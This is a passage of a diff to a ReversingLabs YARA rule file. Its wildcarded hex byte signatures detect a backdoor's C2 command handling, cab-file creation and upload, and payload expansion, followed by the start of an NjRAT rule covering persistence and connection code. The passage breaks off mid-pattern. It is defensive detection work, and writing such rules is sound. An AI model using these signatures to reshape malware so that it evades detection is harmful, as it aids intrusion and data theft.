+            48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
+            48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24
+            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ??
+            ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8
+            ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ??
+            ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ??
+            ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48
+            8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89
+        }
+		$handle_c2_commands_p2 = {
+            05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8
+            ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ??
+            48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C
+            24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83
+            C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83
+            C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ??
+            8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B
+            5B ?? 49 8B 73 ?? 49 8B E3 5F C3
+        }
+		$create_cab_file_and_upload_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1
+            48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8
+            ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ??
+            ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ??
+            0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D
+            05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ??
+            ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ??
+            ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
+            15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8
+            ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
+        }
+		$create_cab_file_and_upload_p2 = {
+            8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45
+            33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8
+            FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9
+            ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15
+            ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B
+            C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B
+            D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33
+            D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33
+            C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40
+            ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B
+        }
+		$create_cab_file_and_upload_p3 = {
+            44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ??
+            ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48
+            83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ??
+            ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44
+            8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05
+            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24
+            ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ??
+            ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48
+            85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24
+            ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2
+            41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74
+        }
+		$create_cab_file_and_upload_p4 = {
+            8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33
+            C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ??
+            ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B
+            D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48
+            8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B
+            CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44
+            8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15
+            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B
+            CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B
+            AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3
+        }
+		$cmd_expand_payload_p1 = {
+            40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
+            ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC
+            24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44
+            89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ??
+            E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7
+            44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33
+            D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15
+            ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ??
+            ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF
+            15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ??
+            ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ??
+            ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ??
+            33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$cmd_expand_payload_p2 = {
+            44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24
+            ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C
+            89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8
+            ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ??
+            ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB
+            FF 15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC
+            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            41 5D 5D 5B C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MC Commerce SP Z o o" and ( pe.signatures [ i ] . serial == "00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures [ i ] . serial == "b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" ) and 1585785600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( all of ( $cmd_expand_payload_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NjRAT backdoor."
 		author = "ReversingLabs"
-		id = "96219c86-f463-5f11-950d-ca2af75d5559"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7"
+		date = "2024-07-31"
+		modified = "2024-07-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5424-L5442"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5"
+		logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "NjRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$persistence_mechanism_v1_p1 = {
+        00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ??
+        00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A
+        00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16
+        72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ??
+        ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2
+        00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28
+        ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+        DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25
+    }
+		$persistence_mechanism_v1_p2 = {
+        28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00
+        28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ??
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D
+        28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ??
+        ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00
+        7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16
+        15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ??
+        ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ??
+        ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ??
+        11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
+        00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ??
+        11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11
+        ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ??
+        11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11
+        ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28
+    }
+		$connect_v1_p1 = {
+        00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ??
+        11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11
+        ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ??
+        ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28
+        ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ??
+        ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ??
+        ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ??
+        ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ??
+        6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18
+        8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
+        00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+        28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00
+        72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
+        ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+    }
+		$connect_v1_p2 = {
+        00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00
+        11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ??
+        A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ??
+        ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ??
+        ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ??
+        A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11
+        ?? 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ??
+        1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F
